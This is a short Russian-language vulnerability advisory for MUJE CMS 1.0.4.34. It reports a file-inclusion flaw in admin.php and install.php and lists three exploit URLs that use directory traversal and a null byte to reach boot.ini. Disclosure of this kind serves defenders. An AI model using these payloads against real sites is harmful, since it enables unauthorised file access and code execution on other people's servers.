Программа: MUJE CMS 1.0.4.34

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в сценариях admin.php и install.php. Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.

Эксплоит:

http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00
http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini
http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00



Оставить мнение